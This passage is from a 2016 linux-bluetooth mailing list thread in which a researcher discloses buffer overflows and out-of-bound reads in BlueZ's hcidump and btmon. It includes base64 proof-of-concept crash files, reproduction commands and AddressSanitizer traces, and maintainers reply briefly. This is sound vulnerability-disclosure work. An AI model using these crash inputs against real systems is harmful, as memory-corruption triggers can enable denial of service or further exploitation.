#8 0x40529e (/opt/bluez/tools/hcidump+0x40529e)
AddressSanitizer can not describe address in more detail (wild memory access suspected).
SUMMARY: AddressSanitizer: heap-buffer-overflow tools/parser/sdp.c:756 sdp_dump
Shadow bytes around the buggy address:
0x0c367fffbf80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbf90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbfa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbfb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbfc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c367fffbfd0: fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbfe0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffc000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffc010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffc020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Contiguous container OOB:fc
ASan internal: fe
==17871==ABORTING
[-- Attachment #12: set_ext_ctrl_BO.txt --]
[-- Type: text/plain, Size: 3973 bytes --]
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
Description:
An buffer overflow was observed in "set_ext_ctrl" function in "tools/parser/l2cap.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command:
./tools/hcidump -a -r <PoC File>
PoC.file base64 encoded:
IAAKABAAAKKAABU0AgAAA+gXAAEABf9WAAAAIAICNwcABwICNwcCAjcHACCAKhU0AgIAAAMXAAEA
Bf//////IK+vr6+vr6+vr6+vr6+vr6+vr6+np6enp6enp6enp6enp6enp6enp6enp6enp6enp29v
b29vb29vb29vb29vb29vb29vb4AAAQAWPk0+WBr/gAD2BAEAEj4+AQAAALoAAwQBABA+Pj5YAAEf
AA7mAQA+CAQSPj4+WBo1utgDBAEAEj4+PUI6Pro=
Affected code:
225 static void set_ext_ctrl(int in, uint16_t handle, uint16_t cid,
226 uint8_t ext_ctrl)
227 {
228 register cid_info *table = cid_table[in];
229 register int i;
230
231 for (i = 0; i < CID_TABLE_SIZE; i++)
232 if (table[i].handle == handle && table[i].cid == cid)
233 table[i].ext_ctrl = ext_ctrl;
234 }
235
Repeat-By:
echo <above base64> > PoC.64
base64 -d PoC.b64 > PoC.file
valgrind ./tools/hcidump -a -r PoC.file
ASAN Report (bluez needs to compiled with -fsanitize=address for this):
==29005==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000000830251 at pc 0x48d708 bp 0x7b4d8ac14f70 sp 0x7b4d8ac14f68
WRITE of size 1 at 0x000000830251 thread T0
#0 0x48d707 in set_ext_ctrl tools/parser/l2cap.c:233
#1 0x48d707 in conf_opt tools/parser/l2cap.c:691
#2 0x498a05 in conf_rsp tools/parser/l2cap.c:781
#3 0x498a05 in l2cap_parse tools/parser/l2cap.c:1256
#4 0x479c9c in acl_dump tools/parser/hci.c:4041
#5 0x479c9c in hci_dump tools/parser/hci.c:4120
#6 0x4035d4 in parse tools/parser/parser.h:260
#7 0x4035d4 in read_dump tools/hcidump.c:425
#8 0x4035d4 in main tools/hcidump.c:810
#9 0x6d210d1b7b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#10 0x40529e (/opt/bluez/tools/hcidump+0x40529e)
0x000000830251 is located 1 bytes to the right of global variable 'frame_table' from 'tools/parser/sdp.c' (0x82ff80) of size 720
SUMMARY: AddressSanitizer: global-buffer-overflow tools/parser/l2cap.c:233 set_ext_ctrl
Shadow bytes around the buggy address:
0x0000800fdff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0000800fe000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0000800fe010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0000800fe020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0000800fe030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0000800fe040: 00 00 00 00 00 00 00 00 00 00[f9]f9 f9 f9 f9 f9
0x0000800fe050: 00 00 00 00 00 00 00 00 00 00 04 f9 f9 f9 f9 f9
0x0000800fe060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0000800fe070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0000800fe080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0000800fe090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Contiguous container OOB:fc
ASan internal: fe
==29005==ABORTING
[-- Attachment #13: set_mode_BO.txt --]
[-- Type: text/plain, Size: 4058 bytes --]
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
Description:
An buffer overflow was observed in "set_mode" function in "tools/parser/l2cap.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command:
./tools/hcidump -a -r <PoC File>
PoC.file base64 encoded:
LQAABP8EDEgAtSy2BA7/AAEQEJABgDIAAAAD6LcaAAEGhwH//39vlgAAAQABAAA9PggAav8HAD4+
IABF2RlAAKKA0xU0AgAAAAEXAAEABf9WAAAAIBkCAAEQAAAANPVq/wcAPj4gACneGUAAooDTFTQC
AAAAARcAAQAF/1YAAAAgGQIAARAAAAA09fECFw4CAAEAAH8VAADeAAAAAEABANM9PggAgP8HAD4+
IAAp+BlAAKKA0xU0AgAA8wEyAAEABf9WAAAAIBkCAAEQAAAANPXxAhcOAgABAAB/FQAAAAAAAABA
AQDTPT4IAID/BwA+PiAAKfgZQACigNMVNAIAGgDTPT4IAID/BwA+PiAAKfgAAW+WAAABAAEAAD0+
CABq/wcAPj4gACnZGUAAooDTFTQCAAAAARcAAQAF/1YAAADeGUAAooDTFTQCAAA=
Affected code:
204 static void set_mode(int in, uint16_t handle, uint16_t cid, uint8_t mode)
205 {
206 register cid_info *table = cid_table[in];
207 register int i;
208
209 for (i = 0; i < CID_TABLE_SIZE; i++)
210 if (table[i].handle == handle && table[i].cid == cid)
211 table[i].mode = mode;
212 }
213
Repeat-By:
echo <above base64> > PoC.64
base64 -d PoC.b64 > PoC.file
valgrind ./tools/hcidump -a -r PoC.file
ASAN Report (bluez needs to compiled with -fsanitize=address for this):
==29456==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000000833090 at pc 0x48d41c bp 0x7b8662e79fa0 sp 0x7b8662e79f98
WRITE of size 1 at 0x000000833090 thread T0
#0 0x48d41b in set_mode tools/parser/l2cap.c:211
#1 0x48d41b in conf_opt tools/parser/l2cap.c:657
#2 0x498a05 in conf_rsp tools/parser/l2cap.c:781
#3 0x498a05 in l2cap_parse tools/parser/l2cap.c:1256
#4 0x479c9c in acl_dump tools/parser/hci.c:4041
#5 0x479c9c in hci_dump tools/parser/hci.c:4120
#6 0x4035d4 in parse tools/parser/parser.h:260
#7 0x4035d4 in read_dump tools/hcidump.c:425
#8 0x4035d4 in main tools/hcidump.c:810
#9 0x7af38a9c4b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#10 0x40529e (/opt/bluez/tools/hcidump+0x40529e)
0x000000833090 is located 0 bytes to the right of global variable 'table' from 'tools/parser/cmtp.c' (0x830340) of size 11600
SUMMARY: AddressSanitizer: global-buffer-overflow tools/parser/l2cap.c:211 set_mode
Shadow bytes around the buggy address:
0x0000800fe5c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0000800fe5d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0000800fe5e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0000800fe5f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0000800fe600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0000800fe610: 00 00[f9]f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x0000800fe620: 00 00 00 00 00 00 00 00 00 00 00 00 01 f9 f9 f9
0x0000800fe630: f9 f9 f9 f9 01 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9
0x0000800fe640: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
0x0000800fe650: 00 00 00 00 04 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
0x0000800fe660: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Contiguous container OOB:fc
ASan internal: fe
==29456==ABORTING
^ permalink raw reply [flat|nested] 8+ messages in thread* Re: multiple buffer overflows and out-of-bound reads
2016-11-14 17:06 multiple buffer overflows and out-of-bound reads op7ic \x00
@ 2016-11-15 9:18 ` Luiz Augusto von Dentz
2016-11-15 9:25 ` op7ic \x00
0 siblings, 1 reply; 8+ messages in thread
From: Luiz Augusto von Dentz @ 2016-11-15 9:18 UTC (permalink / raw)
To: op7ic \x00; +Cc: linux-bluetooth@vger.kernel.org
Hi,
On Mon, Nov 14, 2016 at 7:06 PM, op7ic \x00 <op7ica@gmail.com> wrote:
> Hello list,
>
> I have been playing with hcidump tool recently and came across
> following bugs coming from either out-of-bound reads or buffer
> overflows (see attached reports).
>
> There are couple more I`m working on and will send these later.
I guess we want these to be tested against btmon, hcidump is a deprecated.
--
Luiz Augusto von Dentz
^ permalink raw reply [flat|nested] 8+ messages in thread
* Re: multiple buffer overflows and out-of-bound reads
2016-11-15 9:18 ` Luiz Augusto von Dentz
@ 2016-11-15 9:25 ` op7ic \x00
2016-11-15 10:41 ` François Beaufort
0 siblings, 1 reply; 8+ messages in thread
From: op7ic \x00 @ 2016-11-15 9:25 UTC (permalink / raw)
To: Luiz Augusto von Dentz; +Cc: linux-bluetooth@vger.kernel.org
alright will do - thanks for replying.
On Tue, Nov 15, 2016 at 9:18 AM, Luiz Augusto von Dentz
<luiz.dentz@gmail.com> wrote:
> Hi,
>
> On Mon, Nov 14, 2016 at 7:06 PM, op7ic \x00 <op7ica@gmail.com> wrote:
>> Hello list,
>>
>> I have been playing with hcidump tool recently and came across
>> following bugs coming from either out-of-bound reads or buffer
>> overflows (see attached reports).
>>
>> There are couple more I`m working on and will send these later.
>
> I guess we want these to be tested against btmon, hcidump is a deprecated.
>
> --
> Luiz Augusto von Dentz
^ permalink raw reply [flat|nested] 8+ messages in thread
* Re: multiple buffer overflows and out-of-bound reads
2016-11-15 9:25 ` op7ic \x00
@ 2016-11-15 10:41 ` François Beaufort
2016-11-15 10:51 ` op7ic \x00
0 siblings, 1 reply; 8+ messages in thread
From: François Beaufort @ 2016-11-15 10:41 UTC (permalink / raw)
To: op7ic \x00; +Cc: Luiz Augusto von Dentz, linux-bluetooth@vger.kernel.org
FWIW, I have been witnessing btmon buffer overflows this morning but
can't reproduce anymore.
On Tue, Nov 15, 2016 at 10:25 AM, op7ic \x00 <op7ica@gmail.com> wrote:
> alright will do - thanks for replying.
>
> On Tue, Nov 15, 2016 at 9:18 AM, Luiz Augusto von Dentz
> <luiz.dentz@gmail.com> wrote:
>> Hi,
>>
>> On Mon, Nov 14, 2016 at 7:06 PM, op7ic \x00 <op7ica@gmail.com> wrote:
>>> Hello list,
>>>
>>> I have been playing with hcidump tool recently and came across
>>> following bugs coming from either out-of-bound reads or buffer
>>> overflows (see attached reports).
>>>
>>> There are couple more I`m working on and will send these later.
>>
>> I guess we want these to be tested against btmon, hcidump is a deprecated.
>>
>> --
>> Luiz Augusto von Dentz
> --
> To unsubscribe from this list: send the line "unsubscribe linux-bluetooth" in
> the body of a message to majordomo@vger.kernel.org
> More majordomo info at http://vger.kernel.org/majordomo-info.html
^ permalink raw reply [flat|nested] 8+ messages in thread
* Re: multiple buffer overflows and out-of-bound reads
2016-11-15 10:41 ` François Beaufort
@ 2016-11-15 10:51 ` op7ic \x00
2016-11-15 11:51 ` op7ic \x00
0 siblings, 1 reply; 8+ messages in thread
From: op7ic \x00 @ 2016-11-15 10:51 UTC (permalink / raw)
To: François Beaufort
Cc: Luiz Augusto von Dentz, linux-bluetooth@vger.kernel.org
I got couple in btmon and I started looking at BO's in btmon too.
FWIW whenever the code base is shared similar bugs will appear. You
notice that a lot of BO issues reported are for example due to
unchecked memcpy or just lack of boundary verification on arrays etc .
Once you hit that point same bug appears.
On Tue, Nov 15, 2016 at 10:41 AM, Fran=C3=A7ois Beaufort
<beaufort.francois@gmail.com> wrote:
> FWIW, I have been witnessing btmon buffer overflows this morning but
> can't reproduce anymore.
>
> On Tue, Nov 15, 2016 at 10:25 AM, op7ic \x00 <op7ica@gmail.com> wrote:
>> alright will do - thanks for replying.
>>
>> On Tue, Nov 15, 2016 at 9:18 AM, Luiz Augusto von Dentz
>> <luiz.dentz@gmail.com> wrote:
>>> Hi,
>>>
>>> On Mon, Nov 14, 2016 at 7:06 PM, op7ic \x00 <op7ica@gmail.com> wrote:
>>>> Hello list,
>>>>
>>>> I have been playing with hcidump tool recently and came across
>>>> following bugs coming from either out-of-bound reads or buffer
>>>> overflows (see attached reports).
>>>>
>>>> There are couple more I`m working on and will send these later.
>>>
>>> I guess we want these to be tested against btmon, hcidump is a deprecat=
ed.
>>>
>>> --
>>> Luiz Augusto von Dentz
>> --
>> To unsubscribe from this list: send the line "unsubscribe linux-bluetoot=
h" in
>> the body of a message to majordomo@vger.kernel.org
>> More majordomo info at http://vger.kernel.org/majordomo-info.html
^ permalink raw reply [flat|nested] 8+ messages in thread
* Re: multiple buffer overflows and out-of-bound reads
2016-11-15 10:51 ` op7ic \x00
@ 2016-11-15 11:51 ` op7ic \x00
2016-11-15 12:01 ` Johan Hedberg
0 siblings, 1 reply; 8+ messages in thread
From: op7ic \x00 @ 2016-11-15 11:51 UTC (permalink / raw)
To: François Beaufort
Cc: Luiz Augusto von Dentz, linux-bluetooth@vger.kernel.org
[-- Attachment #1: Type: text/plain, Size: 1742 bytes --]
here are 4 crashes resulting in either out-of-bound reads or buffer
overflows (see attached) but this time in btmon. They are pretty much
similar to bugs reported previously.
On Tue, Nov 15, 2016 at 10:51 AM, op7ic \x00 <op7ica@gmail.com> wrote:
> I got couple in btmon and I started looking at BO's in btmon too.
>
> FWIW whenever the code base is shared similar bugs will appear. You
> notice that a lot of BO issues reported are for example due to
> unchecked memcpy or just lack of boundary verification on arrays etc .
> Once you hit that point same bug appears.
>
>
>
>
> On Tue, Nov 15, 2016 at 10:41 AM, François Beaufort
> <beaufort.francois@gmail.com> wrote:
>> FWIW, I have been witnessing btmon buffer overflows this morning but
>> can't reproduce anymore.
>>
>> On Tue, Nov 15, 2016 at 10:25 AM, op7ic \x00 <op7ica@gmail.com> wrote:
>>> alright will do - thanks for replying.
>>>
>>> On Tue, Nov 15, 2016 at 9:18 AM, Luiz Augusto von Dentz
>>> <luiz.dentz@gmail.com> wrote:
>>>> Hi,
>>>>
>>>> On Mon, Nov 14, 2016 at 7:06 PM, op7ic \x00 <op7ica@gmail.com> wrote:
>>>>> Hello list,
>>>>>
>>>>> I have been playing with hcidump tool recently and came across
>>>>> following bugs coming from either out-of-bound reads or buffer
>>>>> overflows (see attached reports).
>>>>>
>>>>> There are couple more I`m working on and will send these later.
>>>>
>>>> I guess we want these to be tested against btmon, hcidump is a deprecated.
>>>>
>>>> --
>>>> Luiz Augusto von Dentz
>>> --
>>> To unsubscribe from this list: send the line "unsubscribe linux-bluetooth" in
>>> the body of a message to majordomo@vger.kernel.org
>>> More majordomo info at http://vger.kernel.org/majordomo-info.html
[-- Attachment #2: l2cap_packet_BO.txt --]
[-- Type: text/plain, Size: 4580 bytes --]
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
Description:
A buffer overflow was identified in "l2cap_packet" function in "monitor/packet.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command:
./monitor/btmon -r <PoC File>
PoC.file base64 encoded:
AAAAGAOEAAAAABAAAAMAEAkjChgAAwP7AgMDAxADEBAJIwoYAAMD+wIDAwMQAxAAAwMDAA==
Affected code:
3161 index_list[index][in].frag_buf = malloc(len);
3162 if (!index_list[index][in].frag_buf) {
3163 print_text(COLOR_ERROR, "failed buffer allocation") ;
3164 packet_hexdump(data, size);
3165 return;
3166 }
3167
3168 memcpy(index_list[index][in].frag_buf, data, size);
3169 index_list[index][in].frag_pos = size;
3170 index_list[index][in].frag_len = len - size;
3171 index_list[index][in].frag_cid = cid;
3172 break;
Repeat-By:
echo <above base64> > PoC.64
base64 -d PoC.b64 > PoC.file
valgrind ./monitor/btmon -r PoC.file
ASAN Report (bluez needs to compiled with -fsanitize=address for this):
=================================================================
==27023==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x76cf40a9c2c2 at pc 0x679d7a177792 bp 0x76cf40a9b830 sp 0x76cf40a9aff0
READ of size 4095 at 0x76cf40a9c2c2 thread T0
< HCI Command: Unknown (0x00|0x0003) plen 16 [hci0] 0.004096
09 23 0a 18 00 03 03 fb 02 03 03 03 .#..........
< ACL Data TX: Handle 771 flags 0x00 dlen 4099 [hci0] 94308888.197627
#0 0x679d7a177791 (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x2e791)
#1 0x4b9ecc in l2cap_packet monitor/l2cap.c:3168
#2 0x47dda6 in packet_hci_acldata monitor/packet.c:9115
#3 0x483777 in packet_monitor monitor/packet.c:3846
#4 0x417f68 in control_reader monitor/control.c:1415
#5 0x40a142 in main monitor/main.c:220
#6 0x679d79bb0b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#7 0x40b03e (/opt/bluez/monitor/btmon+0x40b03e)
Address 0x76cf40a9c2c2 is located in stack of thread T0 at offset 1778 in frame
#0 0x417b4f in control_reader monitor/control.c:1375
This frame has 5 object(s):
[32, 34) 'pktlen'
[96, 98) 'index'
[160, 162) 'frequency'
[224, 240) 'tv'
[288, 1778) 'buf' <== Memory access at offset 1778 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow ??:0 ??
Shadow bytes around the buggy address:
0x0eda6814b800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0eda6814b810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0eda6814b820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0eda6814b830: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0eda6814b840: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0eda6814b850: 00 00 00 00 00 00 00 00[02]f4 f3 f3 f3 f3 00 00
0x0eda6814b860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1
0x0eda6814b870: f1 f1 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0eda6814b880: 00 00 f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00
0x0eda6814b890: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0eda6814b8a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Contiguous container OOB:fc
ASan internal: fe
==27023==ABORTING
[-- Attachment #3: packet_hexdump_OOB.txt --]
[-- Type: text/plain, Size: 9830 bytes --]
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
Description:
A out-of-bound read was identified in "packet_hexdump" function in "monitor/packet.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command:
./monitor/btmon -r <PoC File>
PoC.file base64 encoded:
AACACQQHGAAaERDoAwAAAAkjBxgAAwMDAwMDAwMDAwMDAwMDAwMDAw==
Affected code:
3736 static const char hexdigits[] = "0123456789abcdef";
3737 char str[68];
3738 uint16_t i;
3739
3740 if (!len)
3741 return;
3742
3743 for (i = 0; i < len; i++) {
3744 str[((i % 16) * 3) + 0] = hexdigits[buf[i] >> 4];
3745 str[((i % 16) * 3) + 1] = hexdigits[buf[i] & 0xf];
3746 str[((i % 16) * 3) + 2] = ' ';
Repeat-By:
echo <above base64> > PoC.64
base64 -d PoC.b64 > PoC.file
valgrind ./monitor/btmon -r PoC.file
ASAN Report (bluez needs to compiled with -fsanitize=address for this):
==13306==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x79fe1636c7e2 at pc 0x42cb3c bp 0x79fe1636bca0 sp 0x79fe1636bc98
READ of size 1 at 0x79fe1636c7e2 thread T0
> ACL Data RX: Handle 0 flags 0x00 dlen 2304 [hci0] 0.437326056
invalid packet size (32764 != 2304)
23 07 18 00 03 03 03 03 03 03 03 03 03 03 03 03 #...............
03 03 03 03 03 03 03 00 00 00 00 00 20 08 82 40 ............ ..@
00 28 80 20 00 00 00 00 40 01 40 23 00 00 00 00 .(. ....@.@#....
a0 04 20 00 00 00 00 00 00 04 00 80 00 00 00 00 .. .............
00 00 10 04 ff ff ff ff 04 01 04 86 9a 39 1c 20 .............9.
54 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Tp..............
00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ................
ff ff ff ff 04 00 00 00 4c 00 00 00 00 00 00 00 ........L.......
00 00 00 00 9a 39 1c 20 54 70 00 00 00 00 00 00 .....9. Tp......
00 00 00 00 56 98 54 00 00 00 00 00 80 c8 36 00 ....V.T.......6.
00 00 00 00 1b 00 00 00 00 00 00 00 59 98 54 00 ............Y.T.
00 00 00 00 00 80 81 21 54 70 00 00 a2 e5 32 1f .......!Tp....2.
54 70 00 00 62 53 61 21 54 70 00 00 00 00 00 00 Tp..bSa!Tp......
00 00 00 00 74 78 61 21 54 70 00 00 80 c5 36 16 ....txa!Tp....6.
fe 79 00 00 00 b0 82 21 54 70 00 00 00 00 00 00 .y.....!Tp......
00 00 00 00 08 00 00 00 30 00 00 00 50 c8 36 16 ........0...P.6.
fe 79 00 00 90 c7 36 16 fe 79 00 00 50 f8 1d 20 .y....6..y..P..
54 70 00 00 a0 e2 51 20 54 70 00 00 00 00 00 00 Tp....Q Tp......
00 00 00 00 00 00 00 00 00 00 00 00 18 c8 36 16 ..............6.
fe 79 00 00 17 c8 36 16 fe 79 00 00 34 c3 36 16 .y....6..y..4.6.
fe 79 00 00 00 00 00 00 00 00 00 00 00 00 00 91 .y..............
6d 2c fc f3 01 00 00 00 00 00 00 00 80 c5 36 16 m,............6.
fe 79 00 00 00 80 81 21 54 70 00 00 a2 e5 32 1f .y.....!Tp....2.
54 70 00 00 00 00 e0 85 6d 2c fc f3 00 00 c2 f0 Tp......m,......
c2 42 a8 e0 00 00 00 00 00 00 00 00 80 c5 36 16 .B............6.
fe 79 00 00 b8 79 82 21 54 70 00 00 51 45 52 20 .y...y.!Tp..QER
54 70 00 00 00 00 40 86 6d 2c fc f3 00 00 c2 f0 Tp....@.m,......
c2 42 a8 e0 06 00 00 00 00 00 00 00 80 c5 36 16 .B............6.
fe 79 00 00 05 16 62 21 54 70 00 00 89 53 74 20 .y....b!Tp...St
54 70 00 00 c8 86 81 21 54 70 00 00 01 00 00 00 Tp.....!Tp......
00 00 00 00 80 c8 36 16 fe 79 00 00 98 86 81 21 ......6..y.....!
54 70 00 00 9b 5b 61 21 54 70 00 00 00 00 01 00 Tp...[a!Tp......
01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 ................
01 00 00 00 35 63 61 21 54 70 00 00 01 00 00 00 ....5ca!Tp......
fe 79 00 00 00 80 81 21 54 70 00 00 00 00 00 00 .y.....!Tp......
00 00 00 00 28 ea 9c 20 54 70 00 00 68 0a 73 20 ....(.. Tp..h.s
54 70 00 00 b5 55 61 21 54 70 00 00 01 00 00 00 Tp...Ua!Tp......
fe 79 00 00 d8 99 81 21 54 70 00 00 30 c4 36 16 .y.....!Tp..0.6.
fe 79 00 00 1c 1c 61 21 54 70 00 00 a8 e8 9c 20 .y....a!Tp.....
54 70 00 00 1c 1c 61 21 54 70 00 00 03 00 00 00 Tp....a!Tp......
00 00 00 00 2e 03 31 1c 00 00 00 00 03 00 00 00 ......1.........
00 00 00 00 0b 00 00 00 00 00 00 00 f8 86 81 21 ...............!
54 70 00 00 8e 25 61 21 54 70 00 00 28 bd 17 20 Tp...%a!Tp..(..
54 70 00 00 00 c5 36 16 fe 79 00 00 28 bd 17 20 Tp....6..y..(..
54 70 00 00 48 c1 17 20 54 70 00 00 10 c6 36 16 Tp..H.. Tp....6.
fe 79 00 00 0c c4 70 00 00 00 00 00 00 c6 36 16 .y....p.......6.
fe 79 00 00 80 87 81 21 54 70 00 00 00 00 00 00 .y.....!Tp......
00 00 00 00 80 87 81 21 54 70 00 00 00 a0 81 21 .......!Tp.....!
54 70 00 00 04 14 40 00 00 00 00 00 78 8d 18 20 Tp....@.....x..
54 70 00 00 70 0a 40 00 00 00 00 00 00 00 00 00 Tp..p.@.........
01 00 00 00 2c 00 00 00 01 00 00 00 90 c6 36 16 ....,.........6.
fe 79 00 00 80 87 81 21 54 70 00 00 a0 c6 36 16 .y.....!Tp....6.
fe 79 00 00 00 b5 82 21 54 70 00 00 c8 c6 36 16 .y.....!Tp....6.
fe 79 00 00 a8 b1 82 21 54 70 00 00 01 00 00 00 .y.....!Tp......
00 00 00 00 3d 27 61 21 54 70 00 00 00 00 00 00 ....='a!Tp......
00 00 00 00 80 87 81 21 54 70 00 00 01 00 00 00 .......!Tp......
54 70 00 00 00 00 00 00 00 00 00 00 01 00 00 00 Tp..............
00 00 00 00 a8 b1 82 21 54 70 00 00 03 00 00 00 .......!Tp......
00 00 00 00 0b 00 00 00 00 00 00 00 f8 86 81 21 ...............!
54 70 00 00 8e 25 61 21 54 70 00 00 00 00 00 00 Tp...%a!Tp......
00 00 00 00 00 b5 82 21 54 70 00 00 10 c6 36 16 .......!Tp....6.
fe 79 00 00 00 c6 36 16 fe 79 00 00 2e 03 31 1c .y....6..y....1.
00 00 00 00 04 14 40 00 00 00 00 00 ff ff ff ff ......@.........
00 00 00 00 20 0f 40 00 00 00 00 00 48 c1 17 20 .... .@.....H..
54 70 00 00 00 a0 81 21 54 70 00 00 00 a0 81 21 Tp.....!Tp.....!
54 70 00 00 da 15 40 00 00 00 00 00 78 8d 18 20 Tp....@.....x..
54 70 00 00 38 03 40 00 00 00 00 00 00 00 00 00 Tp..8.@.........
01 00 00 00 54 02 00 00 01 00 00 00 01 00 00 00 ....T...........
00 00 00 00 80 87 81 21 54 70 00 00 b0 c7 36 16 .......!Tp....6.
fe 79 00 00 00 b5 82 21 54 70 00 00 d8 c7 36 16 .y.....!Tp....6.
fe 79 00 00 e8 56 7d 00 00 00 00 00 00 00 00 00 .y...V}.........
00 00 00 00 00 00 00 00 00 00 00 00 f0 ef 00 00 ................
20 60 00 00 00 00 00 00 00 00 00 00 00 c8 36 16 `............6.
fe 79 00 00 c7 6d 61 21 54 70 00 00 01 00 00 00 .y...ma!Tp......
: #0 0x42cb3b in packet_hexdump monitor/packet.c:3744
#1 0x47dd2b in packet_hexdump monitor/packet.c:3740
#2 0x47dd2b in packet_hci_acldata monitor/packet.c:9108
#3 0x483752 in packet_monitor monitor/packet.c:3849
#4 0x417f68 in control_reader monitor/control.c:1415
#5 0x40a142 in main monitor/main.c:220
